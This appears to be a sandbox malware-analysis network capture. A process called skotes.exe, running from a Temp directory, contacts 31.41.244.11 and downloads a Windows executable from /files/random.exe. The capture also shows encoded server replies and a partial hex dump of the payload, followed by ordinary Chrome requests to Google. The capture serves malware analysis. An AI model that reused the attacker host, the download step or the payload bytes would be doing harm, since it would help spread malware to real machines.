                                                                                                                                                                                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                        Nov 21, 2024 00:51:08.042382002 CET644INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:51:07 GMT
                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        Data Raw: 31 63 35 0d 0a 20 3c 63 3e 31 30 30 37 37 39 37 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 64 39 37 65 39 63 34 35 34 33 62 33 31 64 65 31 35 34 34 31 23 31 30 30 37 37 39 38 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 65 37 65 37 62 39 63 61 33 30 38 30 34 30 34 32 62 61 35 63 65 39 30 32 34 31 35 34 35 30 23 31 30 30 37 37 39 39 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 66 38 65 36 62 31 63 61 37 32 64 64 35 33 34 64 62 30 35 37 65 62 34 31 30 61 34 39 34 64 39 64 23 31 30 30 37 38 30 30 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 66 63 [TRUNCATED]
                                                                                                                                                                                                                                                        Data Ascii: 1c5 <c>1007797001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbd97e9c4543b31de15441#1007798001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e7e7b9ca30804042ba5ce902415450#1007799001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8f8e6b1ca72dd534db057eb410a494d9d#1007800001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8fcf7b8c730804042ba5ce902415450#1007801001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e4f4b2846d934f48b15eaa495c49#<d>0


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        7192.168.2.55010131.41.244.11805396C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        Nov 21, 2024 00:51:08.166084051 CET54OUTGET /files/random.exe HTTP/1.1
                                                                                                                                                                                                                                                        Host: 31.41.244.11
                                                                                                                                                                                                                                                        Nov 21, 2024 00:51:09.550333023 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:51:09 GMT
                                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                                        Content-Length: 4378112
                                                                                                                                                                                                                                                        Last-Modified: Wed, 20 Nov 2024 23:01:54 GMT
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        ETag: "673e6a62-42ce00"
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 e9 85 3c 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 fc 49 00 00 96 73 00 00 32 00 00 00 10 c4 00 00 10 00 00 00 10 4a 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 40 c4 00 00 04 00 00 0b e1 42 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f 00 71 00 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 fa c3 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 fa c3 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL<g(Is2J@@B@ _qs px'@.rsrc p'@.idata q'@ 7q'@sjmyjkxt '@knpounakB@.taggant0"B@
                                                                                                                                                                                                                                                        Nov 21, 2024 00:51:09.550343037 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                        Nov 21, 2024 00:51:09.550400972 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                        Nov 21, 2024 00:51:09.550474882 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                        Nov 21, 2024 00:51:09.550487995 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                        Nov 21, 2024 00:51:09.550519943 CET1236INData Raw: d3 ac be 73 82 e9 48 9d 2a 1f de c7 81 f7 a2 c0 a7 85 f6 90 ea 9b 7c 3f cc e4 5d b4 af 9f b4 7f e1 f7 e5 37 48 58 c4 4b 56 50 55 dc 4a be cd c6 d0 2e 75 78 2f 63 38 86 f9 27 4d 21 af 5b 35 6e 92 42 87 88 3f f2 f4 d6 51 c6 c6 7d 0b 81 bd fe bc 24
                                                                                                                                                                                                                                                        Data Ascii: sH*|?]7HXKVPUJ.ux/c8'M![5nB?Q}$=[vd<3d.2G:C3I!1]/WL`'`-&N#7glJ\#PMXvS'fvq@H0dBFyKt$$m,X?<#Wja2}*G[zb4`m
                                                                                                                                                                                                                                                        Nov 21, 2024 00:51:09.550532103 CET896INData Raw: 92 c1 6f 51 2d 9c 62 5c ae 0f c4 88 84 dc 62 ea fd 40 9a 47 3f 37 98 5b 94 4f 43 cf de db ea 09 84 75 38 bc 0a b6 d7 8a a2 e2 81 e1 8a a0 a7 a5 24 c2 79 9c 23 e7 8f df 0e 17 26 a9 78 2d e1 1c b0 5f e0 c7 f1 51 97 e1 c2 92 fe a9 46 1a 5f 5f 32 f2
                                                                                                                                                                                                                                                        Data Ascii: oQ-b\b@G?7[OCu8$y#&x-_QF__2"rDl3m)nIv}PXYWR\?'>-47J:F,K&;y=B0Zc[ZY>|&,|o6K;Q]B[{DV=h^L"TaDVGz
                                                                                                                                                                                                                                                        Nov 21, 2024 00:51:09.550544024 CET1236INData Raw: 4b 88 99 8b 49 18 57 c3 a9 c3 94 c7 35 93 2a b1 36 36 9e 42 b3 f6 35 57 06 a8 eb 5f 73 d9 1d f1 00 9a 6d f6 7b 19 2a 6c a4 8e 8f 3f 2d 93 94 2a 3a 0d ea 1b 25 8f 9e 0d 60 90 21 02 cb 3b 28 c8 ff 26 89 ff 46 27 ed 5d 26 b9 c9 41 f1 d5 52 5c c8 c8
                                                                                                                                                                                                                                                        Data Ascii: KIW5*66B5W_sm{*l?-*:%`!;(&F']&AR\P?89CLrlf!"Cc#^BVH;Wu,#e(;kou^P~fH:Vce2ohc'4&GV#)e[n6PFH`~
                                                                                                                                                                                                                                                        Nov 21, 2024 00:51:09.550708055 CET1236INData Raw: 3e 1b bd 21 e9 4f 22 d3 47 5a 2a d3 bc 1e 8c 60 4a 82 6d c1 86 92 b3 d3 5f 43 b6 3e 44 e7 49 a7 57 3c bf 59 a6 7e a1 42 92 24 ed 46 bf 94 57 c9 7e 9a 33 b1 27 52 de 84 02 cb cf 73 1e 74 a8 4a 88 0f 8a c4 e4 af b4 29 23 94 74 be c8 ed 8d 94 c5 4c
                                                                                                                                                                                                                                                        Data Ascii: >!O"GZ*`Jm_C>DIW<Y~B$FW~3'RstJ)#tL|(6w =M|J=`r,prc*^ )B ~F7utxLoN2 JG|8I@U)L#zKUD"",fzk'EA@E6^H(xdNcZr^
                                                                                                                                                                                                                                                        Nov 21, 2024 00:51:09.550719023 CET1236INData Raw: 03 1e 58 24 b8 98 24 0c 47 0d a9 eb 3a f6 fd 7e 45 a6 27 4b 62 b9 06 4e 2c c7 9b 4d 74 e3 41 9c 7c 54 36 4c 06 03 ad 16 ee 97 07 73 5a e2 36 99 fe 92 28 be b7 83 e3 65 6a 64 02 0c f7 b0 02 2d 50 80 0d 3f 0b 17 f5 b0 59 f7 ba 86 a5 25 64 66 44 63
                                                                                                                                                                                                                                                        Data Ascii: X$$G:~E'KbN,MtA|T6LsZ6(ejd-P?Y%dfDcPzAlN^Hm@ClVC`{? iaZE2eY]t^Vz$nTWpb#8w76D"cH^.<t6*&:`k&&6/]MGcfsZRX\K@%Xg}p
                                                                                                                                                                                                                                                        Nov 21, 2024 00:51:09.670062065 CET1236INData Raw: 58 d1 55 7a c6 66 d8 b7 f2 d3 32 08 7d 2a 44 23 59 2d 04 51 a6 0d 96 67 06 33 4e 99 ae 55 8a 23 31 b2 47 62 a7 0c b6 5c d1 99 72 df 6a a7 49 da 19 78 29 68 28 36 dc e0 32 b3 61 c5 17 50 f3 13 af 2f 52 54 2a 47 1f 0e 66 de d5 60 2e 0b f7 47 06 cc
                                                                                                                                                                                                                                                        Data Ascii: XUzf2}*D#Y-Qg3NU#1Gb\rjIx)h(62aP/RT*Gf`.Gd$b/!>-e0;`@Kb84vH\E`8D>>>B{>gp$X31F#+Z>[v?zQ]%(#B.2>i_(PIo.Q{


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        0192.168.2.549706142.250.185.2284436500C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:19 UTC623OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                                                        Host: www.google.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCI/KzQEIucrNAQi/0c0BCIrTzQEI0NbNAQio2M0BCPnA1BUYj87NARi60s0BGMLYzQEY642lFw==
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2024-11-20 23:49:19 UTC1266INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:19 GMT
                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                        Expires: -1
                                                                                                                                                                                                                                                        Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                        Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                        Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-1VgU6cJE9yLczoXk5JBKqg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                        Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                        Permissions-Policy: unload=()
                                                                                                                                                                                                                                                        Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                        Server: gws
                                                                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                        2024-11-20 23:49:19 UTC124INData Raw: 65 62 39 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 6f 76 65 72 77 61 74 63 68 20 68 61 7a 61 72 64 20 68 65 72 6f 22 2c 22 70 6f 6b c3 a9 6d 6f 6e 20 74 63 67 20 70 6f 63 6b 65 74 22 2c 22 73 73 69 20 64 65 63 65 6d 62 65 72 20 64 69 72 65 63 74 20 70 61 79 6d 65 6e 74 73 22 2c 22 70 65 6e 74 61 67 6f 6e 20 67 6f 66 61 73 74 20 75 66 6f 22 2c 22 73 6e 6f 77 20 66 6f 72 65
                                                                                                                                                                                                                                                        Data Ascii: eb9)]}'["",["overwatch hazard hero","pokmon tcg pocket","ssi december direct payments","pentagon gofast ufo","snow fore
                                                                                                                                                                                                                                                        2024-11-20 23:49:19 UTC1390INData Raw: 63 61 73 74 20 70 65 6e 6e 73 79 6c 76 61 6e 69 61 22 2c 22 62 6f 73 74 6f 6e 20 62 72 75 69 6e 73 20 63 6f 61 63 68 20 6a 69 6d 20 6d 6f 6e 74 67 6f 6d 65 72 79 22 2c 22 6e 69 65 72 20 61 75 74 6f 6d 61 74 61 20 64 6c 63 20 73 74 65 6c 6c 61 72 20 62 6c 61 64 65 22 2c 22 6e 79 74 20 63 72 6f 73 73 77 6f 72 64 20 63 6c 75 65 73 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d 4e 6f 5a 58 4d 5c 75 30 30 33 64 22 2c 22 67
                                                                                                                                                                                                                                                        Data Ascii: cast pennsylvania","boston bruins coach jim montgomery","nier automata dlc stellar blade","nyt crossword clues"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","g
                                                                                                                                                                                                                                                        2024-11-20 23:49:19 UTC1390INData Raw: 46 69 56 7a 46 56 61 33 68 57 52 31 68 31 4f 44 67 34 4e 45 4a 51 62 47 39 6c 4d 57 4a 4f 51 30 68 4b 55 48 64 71 63 6e 70 50 5a 45 74 69 53 6e 70 4c 55 44 56 55 57 47 31 43 54 48 70 61 61 6d 46 77 5a 33 52 68 55 56 46 34 64 32 70 4c 5a 6d 68 5a 4e 6b 5a 54 56 48 68 53 55 6d 78 58 61 6e 6c 76 4f 45 35 46 4e 33 70 57 52 33 4a 77 63 47 46 6a 65 54 68 54 65 56 6c 43 52 45 52 6b 56 44 42 4a 4f 55 52 32 63 46 5a 77 63 58 46 53 59 55 5a 58 63 55 6b 79 4e 47 31 69 61 48 67 30 4e 32 45 31 57 48 56 55 4e 55 31 4d 53 32 5a 35 54 57 78 51 5a 55 74 47 52 32 68 77 4e 54 52 44 63 32 4e 6a 51 6e 68 4b 53 55 4a 33 63 33 67 32 52 48 70 36 62 30 68 6a 4e 32 74 50 4f 55 31 36 52 6d 4e 78 5a 6d 67 79 4c 32 4a 53 54 32 39 7a 54 6a 4e 79 59 55 78 31 53 56 6c 74 61 6c 70 6d 61
                                                                                                                                                                                                                                                        Data Ascii: FiVzFVa3hWR1h1ODg4NEJQbG9lMWJOQ0hKUHdqcnpPZEtiSnpLUDVUWG1CTHpaamFwZ3RhUVF4d2pLZmhZNkZTVHhSUmxXanlvOE5FN3pWR3JwcGFjeThTeVlCRERkVDBJOUR2cFZwcXFSYUZXcUkyNG1iaHg0N2E1WHVUNU1MS2Z5TWxQZUtGR2hwNTRDc2NjQnhKSUJ3c3g2RHp6b0hjN2tPOU16RmNxZmgyL2JST29zTjNyYUx1SVltalpma
                                                                                                                                                                                                                                                        2024-11-20 23:49:19 UTC872INData Raw: 63 31 52 36 52 32 4a 30 61 47 52 46 4f 58 70 33 4d 55 77 77 61 6c 42 4f 4d 32 74 6e 61 6d 4a 50 64 30 39 6a 59 6d 70 56 4b 33 56 69 64 45 68 53 55 6e 68 49 5a 44 4e 69 61 6d 74 69 63 58 70 68 63 44 6b 32 62 7a 52 77 4d 6d 70 77 57 6b 31 48 54 6c 64 4d 51 57 56 6c 63 47 52 6d 4e 48 70 45 56 33 5a 47 4f 55 74 75 57 54 5a 53 4d 43 74 54 4d 58 49 7a 52 31 70 72 62 7a 4e 4e 4f 46 52 73 4e 6d 52 50 53 47 52 6e 59 31 6c 49 54 57 35 57 51 6a 64 50 56 55 78 34 4d 44 46 51 55 6a 42 70 63 57 46 78 63 47 4e 4c 62 54 4a 34 57 57 35 42 53 6a 68 30 65 54 4e 72 54 53 74 48 63 44 64 61 55 6e 67 7a 53 30 4e 4b 61 6a 68 45 54 30 4e 6d 64 48 59 34 51 58 68 78 65 43 38 77 4e 32 46 4c 55 79 39 57 52 6d 52 4f 64 33 51 33 52 45 4a 74 54 6c 41 33 61 32 31 57 57 44 64 6a 53 57 73
                                                                                                                                                                                                                                                        Data Ascii: c1R6R2J0aGRFOXp3MUwwalBOM2tnamJPd09jYmpVK3VidEhSUnhIZDNiamticXphcDk2bzRwMmpwWk1HTldMQWVlcGRmNHpEV3ZGOUtuWTZSMCtTMXIzR1prbzNNOFRsNmRPSGRnY1lITW5WQjdPVUx4MDFQUjBpcWFxcGNLbTJ4WW5BSjh0eTNrTStHcDdaUngzS0NKajhET0NmdHY4QXhxeC8wN2FLUy9WRmROd3Q3REJtTlA3a21WWDdjSWs
                                                                                                                                                                                                                                                        2024-11-20 23:49:19 UTC179INData Raw: 61 64 0d 0a 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 5d 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 74 79 70 65 22 3a 5b 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 45 4e 54 49 54 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 5d 7d 5d 0d 0a
                                                                                                                                                                                                                                                        Data Ascii: ad3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","ENTITY","QUERY","QUERY"]}]
                                                                                                                                                                                                                                                        2024-11-20 23:49:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        1192.168.2.549708142.250.185.2284436500C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:19 UTC353OUTGET /async/ddljson?async=ntp:2 HTTP/1.1
                                                                                                                                                                                                                                                        Host: www.google.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        2192.168.2.549709142.250.185.2284436500C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:19 UTC526OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                                                                        Host: www.google.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCI/KzQEIucrNAQi/0c0BCIrTzQEI0NbNAQio2M0BCPnA1BUYj87NARi60s0BGMLYzQEY642lFw==
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2024-11-20 23:49:19 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Version: 697903402
                                                                                                                                                                                                                                                        Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                        Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                        Permissions-Policy: unload=()
                                                                                                                                                                                                                                                        Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:19 GMT
                                                                                                                                                                                                                                                        Server: gws
                                                                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                        2024-11-20 23:49:19 UTC372INData Raw: 32 30 32 66 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65
                                                                                                                                                                                                                                                        Data Ascii: 202f)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
